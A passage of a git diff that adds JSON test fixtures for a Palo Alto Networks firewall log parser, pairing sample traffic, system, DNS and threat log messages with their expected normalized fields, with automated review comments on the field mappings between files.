PanOSSourceUser=paloaltonetwork\\\\xxxxx PanOSDestinationUser=paloaltonetworkxxxxx PanOSApplication=panorama cs3=vsys1 cs3Label=VirtualLocation cs4=corporate cs4Label=FromZone cs5=untrust cs5Label=ToZone PanOSInboundInterface=ethernet1/1 deviceOutboundInterface=ethernet1/2 cs6=test cs6Label=LogSetting PanOSSessionID=391582 cnt=1 spt=3033 dpt=5496 PanOSNATSourcePort=26714 PanOSNATDestinationPort=15054 proto=tcp act=alert PanOSDGHierarchyLevel1=12 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=PA-5220 externalId=xxxxxxxxxxxxx PanOSEndpointAssociationID=2086888838 PanOSPayloadProtocolID=-1 PanOSSctpChunkType=9 PanOSSCTPEventType=Kerberos single sign-on failed PanOSEventCode=3 PanOSVerificationTag1=0x3bae3042 PanOSVerificationTag2=0x1911015e PanOSSctpCauseCode=0 PanOSDiamAppID=-1 PanOSDiameterCommandCode=-1 PanOSDiamAvpCode=0 PanOSStreamID=0 PanOSAssocationEndReason= PanOSMapAppCode=0 PanOSSccpCallingSSN=0 PanOSSccpCallingGt= PanOSSctpFilter= PanOSChunksTotal=0 PanOSChunksSent=0 PanOSChunksReceived=0 PanOSPacketsTotal=0 PanOSPacketsSent=0 PanOSPacketsReceived=0 PanOSRuleUUID= PanOSContainerID= PanOSContainerNameSpace= PanOSContainerName= PanOSSourceEDL= PanOSDestinationEDL= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup= PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12" + }, + "expected": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|SCTP||9|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 21:22:02 deviceExternalId=xxxxxxxxxxxxx PanOSCaptivePortal= PanOSContentVersion= PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSDestinationDeviceClass= PanOSDestinationDeviceMac= PanOSDestinationDeviceModel= PanOSDestinationDeviceOS= PanOSDestinationDeviceVendor= PanOSDestinationLocation=IN PanOSDestinationUUID= PanOSDestinationUserDomain=paloaltonetwork PanOSDestinationUserName=xxxxx PanOSDestinationUserUUID= PanOSInboundInterfaceDetailsPort=1 PanOSInboundInterfaceDetailsSlot=1 
PanOSInboundInterfaceDetailsType=ethernet PanOSInboundInterfaceDetailsUnit=0 PanOSIsClienttoServer= PanOSIsContainer= PanOSIsDecryptMirror= PanOSIsDecryptedLog= PanOSIsDecryptedPayloadForward= PanOSIsDuplicateLog=false PanOSIsIPV6= PanOSIsInspectrionBeforeSession= PanOSIsMptcpOn= PanOSIsNonStandardDestinationPort= PanOSIsPacketCapture= PanOSIsPhishing= PanOSIsPrismaNetwork=false PanOSIsPrismaUsers=false PanOSIsProxy= PanOSIsReconExcluded= PanOSIsServertoClient= PanOSIsSourceXForwarded= PanOSIsSystemReturn= PanOSIsTransaction= PanOSIsTunnelInspected= PanOSIsURLDenied= PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSNAT= PanOSOutboundInterfaceDetailsPort=2 PanOSOutboundInterfaceDetailsSlot=1 PanOSOutboundInterfaceDetailsType=ethernet PanOSOutboundInterfaceDetailsUnit=0 PanOSSessionEndReason= PanOSSessionOwnerMidx= PanOSSessionTracker= PanOSSeverity=Critical PanOSSourceDeviceClass= PanOSSourceDeviceMac= PanOSSourceDeviceModel= PanOSSourceDeviceOS= PanOSSourceDeviceVendor= PanOSSourceLocation=US PanOSSourceUUID= PanOSSourceUserDomain=paloaltonetwork PanOSSourceUserName=xxxxx PanOSSourceUserUUID= PanOSTunnel=N/A PanOSVirtualSystemID=1 PanOSConfigVersion= start=Mar 01 2021 21:22:02 src=1.1.1.1 dst=1.1.1.1 PanOSNATSource=1.1.1.1 PanOSNATDestination=1.1.1.1 cs1=allow-business-apps cs1Label=Rule PanOSSourceUser=paloaltonetwork\\\\xxxxx PanOSDestinationUser=paloaltonetworkxxxxx PanOSApplication=panorama cs3=vsys1 cs3Label=VirtualLocation cs4=corporate cs4Label=FromZone cs5=untrust cs5Label=ToZone PanOSInboundInterface=ethernet1/1 deviceOutboundInterface=ethernet1/2 cs6=test cs6Label=LogSetting PanOSSessionID=391582 cnt=1 spt=3033 dpt=5496 PanOSNATSourcePort=26714 PanOSNATDestinationPort=15054 proto=tcp act=alert PanOSDGHierarchyLevel1=12 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=PA-5220 externalId=xxxxxxxxxxxxx PanOSEndpointAssociationID=2086888838 
PanOSPayloadProtocolID=-1 PanOSSctpChunkType=9 PanOSSCTPEventType=Kerberos single sign-on failed PanOSEventCode=3 PanOSVerificationTag1=0x3bae3042 PanOSVerificationTag2=0x1911015e PanOSSctpCauseCode=0 PanOSDiamAppID=-1 PanOSDiameterCommandCode=-1 PanOSDiamAvpCode=0 PanOSStreamID=0 PanOSAssocationEndReason= PanOSMapAppCode=0 PanOSSccpCallingSSN=0 PanOSSccpCallingGt= PanOSSctpFilter= PanOSChunksTotal=0 PanOSChunksSent=0 PanOSChunksReceived=0 PanOSPacketsTotal=0 PanOSPacketsSent=0 PanOSPacketsReceived=0 PanOSRuleUUID= PanOSContainerID= PanOSContainerNameSpace= PanOSContainerName= PanOSSourceEDL= PanOSDestinationEDL= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup= PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12", + "event": { + "action": "alert", + "category": [ + "network" + ], + "dataset": "sctp", + "severity": 9, + "start": "2021-03-01T21:22:02Z", + "timezone": "UTC", + "type": [ + "info" + ] + }, + "@timestamp": "2021-03-01T21:22:02Z", + "destination": { + "address": "1.1.1.1", + "geo": { + "country_iso_code": "IN" + }, + "ip": "1.1.1.1", + "packets": 0, + "port": 5496 + }, + "host": { + "hostname": "PA-5220", + "id": "xxxxxxxxxxxxx", + "name": "PA-5220" + }, + "log": { + "hostname": "PA-5220", + "logger": "sctp" + }, + "network": { + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "alias": "untrust", + "id": "2", + "name": "ethernet1/2" + } + }, + "ingress": { + "interface": { + "alias": "corporate" + } + }, + "product": "PAN-OS", + "type": "LF", + "vendor": "Palo Alto Networks", + "version": "2.0" + }, + "paloalto": { + "PanOSSourceLocation": "US", + "VirtualLocation": "vsys1" + }, + "related": { + "hosts": [ + "PA-5220" + ], + "ip": [ + "1.1.1.1" + ], + "user": [ + "xxxxx" + ] + }, + "rule": { + "name": "allow-business-apps" + }, + "source": { + "address": "1.1.1.1", + "ip": "1.1.1.1", + "packets": 0, + "port": 3033, + "user": { + "name": "xxxxx" + } + }, + "user": { + "name": "xxxxx" + } + } +} \ No newline at 
end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/system_csv.json b/Palo Alto Networks/paloalto-prima-access/tests/system_csv.json new file mode 100644 index 000000000..3e52f494c --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/system_csv.json @@ -0,0 +1,56 @@ +{ + "input": { + "message": "1,2020/12/08 13:44:55,11111114444,SYSTEM,auth,0,2020/12/08 13:44:55,,auth-success,GP,0,0,general,informational,\"authenticated for user 'user1'. auth profile 'GP', vsys 'vsys123', server profile 'LDAP', server address 'srv01.entreprise.local', From: 1.2.3.4.\",5211100,0x8000000000000000,0,0,0,0,,fw1" + }, + "expected": { + "message": "1,2020/12/08 13:44:55,11111114444,SYSTEM,auth,0,2020/12/08 13:44:55,,auth-success,GP,0,0,general,informational,\"authenticated for user 'user1'. auth profile 'GP', vsys 'vsys123', server profile 'LDAP', server address 'srv01.entreprise.local', From: 1.2.3.4.\",5211100,0x8000000000000000,0,0,0,0,,fw1", + "event": { + "category": [ + "authentication" + ], + "dataset": "system", + "reason": "authenticated for user 'user1'. auth profile 'GP', vsys 'vsys123', server profile 'LDAP', server address 'srv01.entreprise.local', From: 1.2.3.4.", + "type": [ + "start" + ] + }, + "@timestamp": "2020-12-08T13:44:55Z", + "action": { + "name": "auth-success", + "type": "auth" + }, + "log": { + "hostname": "fw1", + "level": "informational", + "logger": "system" + }, + "observer": { + "name": "fw1", + "product": "PAN-OS", + "serial_number": "11111114444" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "EventID": "auth-success", + "Threat_ContentType": "auth" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "user1" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "name": "user1" + } + } +} \ No newline at end of file 
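Review bot: The fixture uses `1.1.1.1` for `src`, `dst` and both NAT addresses, a live public resolver rather than a documentation range; test data should use RFC 5737 space (for example `192.0.2.10` / `198.51.100.20`) so a fixture can never be mistaken for, or leak into, real telemetry. The expected side is also asymmetric: `observer.egress.interface` gets `id`/`name` from `deviceOutboundInterface`, while `PanOSInboundInterface=ethernet1/1` and `PanOSInboundInterfaceDetailsPort=1` are present in the input but only the zone alias `corporate` is asserted for ingress. `PanOSSeverity=Critical` and `PanOSSCTPEventType=Kerberos single sign-on failed` are likewise not surfaced into `log.level`/`event.reason`, although the JSON fixtures in this same diff map `VendorSeverity` to `log.level`; if the CEF dialect is meant to be on par, the expected block should assert those fields too.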
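Review bot: An `auth-success` system event is asserted with `event.category: ["authentication"]` and `event.type: ["start"]` but no `event.outcome`, so detection content that pivots on `event.outcome: success|failure` for authentication events will not see it; the expected block should carry `"outcome": "success"` under `event` (and `action.outcome` for consistency with the threat fixtures), with the corresponding parser mapping added where the `EventID` is handled (not in this diff). The message also names the authenticating server `srv01.entreprise.local`, which is extracted nowhere; adding it to `related.hosts` would make the fixture cover server-side pivoting as well, though that is optional.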
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/tcp_allow_csv.json b/Palo Alto Networks/paloalto-prima-access/tests/tcp_allow_csv.json new file mode 100644 index 000000000..eb10d6148 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/tcp_allow_csv.json 
@@ -0,0 +1,77 @@ +{ + "input": { + "message": "<14>Sep 16 10:00:02 PA-1 1,9/16/19 10:00,1801016000,TRAFFIC,start,2049,9/16/19 10:00,1.2.3.4,4.3.2.1,0.0.0.0,0.0.0.0,proxy1,,,web-browsing,vsys1234,v10213,zone1,a.1,b.2,Secure,9/16/19 10:00,60000,1,61000,80,0,0,0x0,tcp,allow,800,700,70,2,9/16/19 10:00,0,any,0,50660381839,0x0,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,2,1,n/a,0,0,0,0,,PP,from-policy,,,0,,0,,N/A,0,0,0,0" + }, + "expected": { + "message": "<14>Sep 16 10:00:02 PA-1 1,9/16/19 10:00,1801016000,TRAFFIC,start,2049,9/16/19 10:00,1.2.3.4,4.3.2.1,0.0.0.0,0.0.0.0,proxy1,,,web-browsing,vsys1234,v10213,zone1,a.1,b.2,Secure,9/16/19 10:00,60000,1,61000,80,0,0,0x0,tcp,allow,800,700,70,2,9/16/19 10:00,0,any,0,50660381839,0x0,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,2,1,n/a,0,0,0,0,,PP,from-policy,,,0,,0,,N/A,0,0,0,0", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "traffic", + "duration": 0, + "outcome": "success", + "type": [ + "start" + ] + }, + "@timestamp": "2019-09-16T10:00:00Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "4.3.2.1", + "bytes": 70, + "ip": "4.3.2.1", + "nat": { + "ip": "0.0.0.0", + "port": 0 + }, + "packets": 1, + "port": 80 + }, + "log": { + "hostname": "PP", + "logger": "traffic" + }, + "network": { + "application": "web-browsing", + "bytes": 800, + "packets": 2, + "transport": "tcp" + }, + "observer": { + "name": "PP", + "product": "PAN-OS", + "serial_number": "1801016000" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1234" + }, + "related": { + "ip": [ + "0.0.0.0", + "1.2.3.4", + "4.3.2.1" + ] + }, + "rule": { + "name": "proxy1" + }, + "source": { + "address": "1.2.3.4", + "bytes": 700, + "ip": "1.2.3.4", + "nat": { + "ip": "0.0.0.0", + "port": 0 + }, + "packets": 2, + "port": 61000 + } + } +} \ No newline at end of file 
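Review bot: The placeholder NAT addresses `0.0.0.0` from the CSV are promoted to `source.nat.ip`, `destination.nat.ip` and, more importantly, `related.ip`; `related.ip` is the usual field for IOC matching and correlation, and asserting `0.0.0.0` there locks in noise that every such rule has to special-case. The parser should drop all-zero or empty NAT addresses (and port `0`) instead of mapping them, and the expected `related.ip` should then be `["1.2.3.4", "4.3.2.1"]`. Separately, the CSV timestamps (`9/16/19 10:00`) carry no timezone, and the fixture asserts `2019-09-16T10:00:00Z`; that UTC assumption is presumably a property of the dialect, but it is worth a one-line comment in the parser since it silently shifts every event from a non-UTC firewall.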
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_cloud_election_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_cloud_election_json.json new file mode 100644 index 000000000..3af5d5428 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_cloud_election_json.json 
@@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\"LogTime\":\"2023-02-16T15:36:37.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"url-filtering\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:36:23.000000Z\",\"VirtualLocation\":null,\"EventName\":\"cloud-election\",\"EventComponent\":\"\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"CLOUD ELECTION: serverlist2.urlcloud.paloaltonetworks.com IP: 35.244.229.101 was elected, measured alive test 143294.\",\"SequenceNo\":7200776623254143113,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:36:23.710000Z\"}\n" + }, + "expected": { + "message": "{\"LogTime\":\"2023-02-16T15:36:37.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"url-filtering\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:36:23.000000Z\",\"VirtualLocation\":null,\"EventName\":\"cloud-election\",\"EventComponent\":\"\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"CLOUD ELECTION: serverlist2.urlcloud.paloaltonetworks.com IP: 35.244.229.101 was elected, measured alive test 143294.\",\"SequenceNo\":7200776623254143113,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:36:23.710000Z\"}\n", + "event": { + "category": [ + "network" + ], + "dataset": "system", + "reason": "CLOUD ELECTION: serverlist2.urlcloud.paloaltonetworks.com IP: 35.244.229.101 was elected, measured alive test 143294.", + "type": [ + "info" + ] + }, + "@timestamp": "2023-02-16T15:36:23Z", + "action": { + "type": "url-filtering" + }, + "destination": { + "address": 
"serverlist2.urlcloud.paloaltonetworks.com", + "domain": "serverlist2.urlcloud.paloaltonetworks.com", + "ip": "35.244.229.101", + "registered_domain": "paloaltonetworks.com", + "subdomain": "serverlist2.urlcloud", + "top_level_domain": "com" + }, + "host": { + "name": "PA-VM" + }, + "log": { + "level": "Informational", + "logger": "system" + }, + "observer": { + "product": "PAN-OS" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "url-filtering" + }, + "related": { + "hosts": [ + "serverlist2.urlcloud.paloaltonetworks.com" + ], + "ip": [ + "35.244.229.101" + ] + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_dhcp_renew_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_dhcp_renew_json.json new file mode 100644 index 000000000..5e1cc96a9 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_dhcp_renew_json.json 
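Review bot: `LogSourceID` (`007954000351998`) is not asserted anywhere, whereas the other fixtures in this diff map `DeviceSN` to `observer.serial_number`; for the Cortex Data Lake SYSTEM schema `LogSourceID` appears to play the same role (device serial), so the expected block should include `"observer": {"product": "PAN-OS", "serial_number": "007954000351998"}` if the parser is meant to be consistent across dialects. The `destination.*` values are evidently regex-extracted from the free-text `EventDescription`; that works for this `CLOUD ELECTION` message, but the `url-filtering` subtype can presumably carry other wording, so a second fixture with a non-matching description would confirm the extraction fails closed rather than populating `destination.domain` with stray text.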
@@ -0,0 +1,56 @@ +{ + "input": { + "message": "{\"LogTime\":\"2023-02-16T17:08:26.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"dhcp\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T17:08:17.000000Z\",\"VirtualLocation\":null,\"EventName\":\"if-renew-trigger\",\"EventComponent\":\"\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"DHCP RENEW: interface eth0, ip 1.2.3.4 netmask 255.255.255.0 dhcp server: 1.2.3.1\",\"SequenceNo\":7200776623254143234,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T17:08:17.774000Z\"}\n" + }, + "expected": { + "message": "{\"LogTime\":\"2023-02-16T17:08:26.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"dhcp\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T17:08:17.000000Z\",\"VirtualLocation\":null,\"EventName\":\"if-renew-trigger\",\"EventComponent\":\"\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"DHCP RENEW: interface eth0, ip 1.2.3.4 netmask 255.255.255.0 dhcp server: 1.2.3.1\",\"SequenceNo\":7200776623254143234,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T17:08:17.774000Z\"}\n", + "event": { + "category": [ + "network" + ], + "dataset": "system", + "reason": "DHCP RENEW: interface eth0, ip 1.2.3.4 netmask 255.255.255.0 dhcp server: 1.2.3.1", + "type": [ + "info" + ] + }, + "@timestamp": "2023-02-16T17:08:17Z", + "action": { + "type": "dhcp" + }, + "destination": { + "address": "1.2.3.1" + }, + "host": { + "name": "PA-VM" + }, + "log": { + "level": "Informational", + "logger": "system" + }, + "observer": { + "ingress": { + "interface": { + "name": 
"eth0" + } + }, + "product": "PAN-OS" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "dhcp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_dns_proxy_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_dns_proxy_json.json new file mode 100644 index 000000000..f4541dcbf --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_dns_proxy_json.json 
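Review bot: The DHCP server address is asserted only as `destination.address: "1.2.3.1"`, with no `destination.ip`, and `related.ip` contains just `1.2.3.4`; the client address on the same line gets both `source.address` and `source.ip`. Since `related.ip` and `destination.ip` are what correlation and IOC rules query, the expected block should be `"destination": {"address": "1.2.3.1", "ip": "1.2.3.1"}` and `"related": {"ip": ["1.2.3.1", "1.2.3.4"]}`, with the parser mapping adjusted to match. Placing the renewing interface `eth0` under `observer.ingress.interface.name` is a stretch for a management-interface lease on the firewall itself; `observer.ingress` is a directional concept, so confirm this is the intended home rather than a plain `paloalto.*` field.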
@@ -0,0 +1,39 @@ +{ + "input": { + "message": "{\"LogTime\":\"2023-02-16T15:31:51.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"dnsproxy\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:31:50.000000Z\",\"VirtualLocation\":null,\"EventName\":\"if-inherit\",\"EventComponent\":\"mgmt-obj\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"DNS Proxy object: mgmt-obj inherited following values from dynamic interface: mgmt-if: Primary DNS: 1.2.3.1 Secondary DNS: ::\",\"SequenceNo\":7200776623254142979,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:31:50.584000Z\"}\n" + }, + "expected": { + "message": "{\"LogTime\":\"2023-02-16T15:31:51.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"dnsproxy\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:31:50.000000Z\",\"VirtualLocation\":null,\"EventName\":\"if-inherit\",\"EventComponent\":\"mgmt-obj\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"DNS Proxy object: mgmt-obj inherited following values from dynamic interface: mgmt-if: Primary DNS: 1.2.3.1 Secondary DNS: ::\",\"SequenceNo\":7200776623254142979,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:31:50.584000Z\"}\n", + "event": { + "category": [ + "network" + ], + "dataset": "system", + "reason": "DNS Proxy object: mgmt-obj inherited following values from dynamic interface: mgmt-if: Primary DNS: 1.2.3.1 Secondary DNS: ::", + "type": [ + "info" + ] + }, + "@timestamp": "2023-02-16T15:31:50Z", + "action": { + "type": "dnsproxy" + }, + "host": { + "name": "PA-VM" + }, + "log": { + "level": 
"Informational", + "logger": "system" + }, + "observer": { + "product": "PAN-OS" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "dnsproxy" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_dns_response.json b/Palo Alto Networks/paloalto-prima-access/tests/test_dns_response.json new file mode 100644 index 000000000..ce111a3ad --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_dns_response.json 
@@ -0,0 +1,67 @@ +{ + "input": { + "message": "{\"VendorName\":\"test networks\",\"DeviceSN\":\"7FD26D6XXXXXXXX\",\"TimeReceived\":\"2024-07-08T09:01:10.502737Z\",\"LogType\":\"DNS\",\"Subtype\":\"realtime_dns_telemetry_response\",\"SubType\":\"realtime_dns_telemetry_response\",\"TimeGenerated\":\"2024-07-08T09:01:10.000000Z\",\"RecordType\":\"a\",\"DNSResolverIP\":\"1.2.3.4\",\"ThreatID\":0,\"DNSCategory\":\"benign\",\"ThreatName\":null,\"SourceAddress\":\"5.6.7.8\",\"FromZone\":\"trust\",\"Action\":\"Allow\",\"DNSResponse\":[\"8.9.1.2\"],\"ToZone\":null,\"DestinationUser\":null}", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "{\"VendorName\":\"test networks\",\"DeviceSN\":\"7FD26D6XXXXXXXX\",\"TimeReceived\":\"2024-07-08T09:01:10.502737Z\",\"LogType\":\"DNS\",\"Subtype\":\"realtime_dns_telemetry_response\",\"SubType\":\"realtime_dns_telemetry_response\",\"TimeGenerated\":\"2024-07-08T09:01:10.000000Z\",\"RecordType\":\"a\",\"DNSResolverIP\":\"1.2.3.4\",\"ThreatID\":0,\"DNSCategory\":\"benign\",\"ThreatName\":null,\"SourceAddress\":\"5.6.7.8\",\"FromZone\":\"trust\",\"Action\":\"Allow\",\"DNSResponse\":[\"8.9.1.2\"],\"ToZone\":null,\"DestinationUser\":null}", + "event": { + "action": "Allow", + "category": [ + "network" + ], + "dataset": "dns", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-08T09:01:10Z", + "action": { + "name": "Allow", + "outcome": "success", + "type": "realtime_dns_telemetry_response" + }, + "dns": { + "question": { + "type": "a" + }, + "resolved_ip": [ + "8.9.1.2" + ] + }, + "log": { + "logger": "dns" + }, + "observer": { + "ingress": { + "interface": { + "alias": "trust" + } + }, + "product": "PAN-OS", + "serial_number": "7FD26D6XXXXXXXX" + }, + "paloalto": { + "Threat_ContentType": "realtime_dns_telemetry_response", + "dns": { + "category": "benign" + } + }, + "related": { + "ip": [ + "5.6.7.8", + 
"8.9.1.2" + ] + }, + "source": { + "address": "5.6.7.8", + "ip": "5.6.7.8" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_file_alert_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_file_alert_json.json new file mode 100644 index 000000000..3142ed671 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_file_alert_json.json 
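Review bot: `event.action` is asserted as `"Allow"` with the vendor's capitalization, while the traffic fixture in this same diff asserts `"allow"`; keyword matching in detection rules is case-sensitive, so the same verdict would need two spellings. Normalizing in the parser (lowercasing the action) and asserting `"action": "allow"` here, including under `action.name`, keeps the two dialects interchangeable. The input also carries `DNSResolverIP: 1.2.3.4`, which never reaches the expected output; mapping it to `destination.ip` and adding it to `related.ip` would let resolver-based pivots work, whereas today only the client and the answer (`8.9.1.2`) are indexed.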
@@ -0,0 +1,105 @@
+{
+ "input": {
+ "message": "{\"TimeReceived\": \"2024-02-06T18:17:09.000000Z\", \"DeviceSN\": \"no-serial\", \"LogType\": \"THREAT\", \"Subtype\": \"file\", \"SubType\": \"file\", \"ConfigVersion\": \"10.2\", \"TimeGenerated\": \"2024-02-06T18:17:02.000000Z\", \"SourceAddress\": \"1.2.3.4\", \"DestinationAddress\": \"5.6.7.8\", \"NATSource\": \"9.10.11.12\", \"NATDestination\": \"5.6.7.8\", \"Rule\": \"Global_Outbound_internet_access\", \"SourceUser\": \"john.doe@example.com\", \"DestinationUser\": null, \"Application\": \"web-browsing\", \"VirtualLocation\": \"vsys1\", \"FromZone\": \"trust\", \"ToZone\": \"untrust\", \"InboundInterface\": \"tunnel.1\", \"OutboundInterface\": \"ethernet1/1\", \"LogSetting\": \"default\", \"SessionID\": 1450762, \"RepeatCount\": 1, \"SourcePort\": 53514, \"DestinationPort\": 80, \"NATSourcePort\": 22444, \"NATDestinationPort\": 80, \"Protocol\": \"tcp\", \"Action\": \"alert\", \"FileName\": \"some_file_name\", \"URLCategory\": \"computer-and-internet-info\", \"VendorSeverity\": \"Low\", \"DirectionOfAttack\": \"server to client\", \"SequenceNo\": 7292474944208657622, \"SourceLocation\": \"Prisma-Mobile-Users-EMEA\", \"DestinationLocation\": \"US\", \"PacketID\": 0, \"FileHash\": null, \"ReportID\": 0, \"DGHierarchyLevel1\": 463, \"DGHierarchyLevel2\": 467, \"DGHierarchyLevel3\": 0, \"DGHierarchyLevel4\": 0, \"VirtualSystemName\": \"\", \"DeviceName\": \"GP cloud service\", \"SourceUUID\": null, \"DestinationUUID\": null, \"IMSI\": 0, \"IMEI\": null, \"ParentSessionID\": 0, \"ParentStartTime\": \"1970-01-01T00:00:00.000000Z\", \"Tunnel\": \"N/A\", \"ContentVersion\": \"577053022\", \"SigFlags\": 0, \"RuleUUID\": \"c38e111b-43fc-4de4-a17c-c372af557193\", \"HTTP2Connection\": 0, \"DynamicUserGroup\": null, \"X-Forwarded-ForIP\": null, \"SourceDeviceCategory\": null, \"SourceDeviceProfile\": null, \"SourceDeviceModel\": null, \"SourceDeviceVendor\": null, \"SourceDeviceOSFamily\": null, \"SourceDeviceOSVersion\": null, \"SourceDeviceHost\": null, \"SourceDeviceMac\": null, \"DestinationDeviceCategory\": null, \"DestinationDeviceProfile\": null, \"DestinationDeviceModel\": null, \"DestinationDeviceVendor\": null, \"DestinationDeviceOSFamily\": null, \"DestinationDeviceOSVersion\": null, \"DestinationDeviceHost\": null, \"DestinationDeviceMac\": null, \"ContainerID\": null, \"ContainerNameSpace\": null, \"ContainerName\": null, \"SourceEDL\": null, \"DestinationEDL\": null, \"HostID\": null, \"EndpointSerialNumber\": null, \"DomainEDL\": null, \"SourceDynamicAddressGroup\": null, \"DestinationDynamicAddressGroup\": null, \"PartialHash\": 0, \"TimeGeneratedHighResolution\": \"2024-02-06T18:17:02.077000Z\", \"ReasonForDataFilteringAction\": null, \"Justification\": null, \"NSSAINetworkSliceType\": null}"
+ },
+ "expected": {
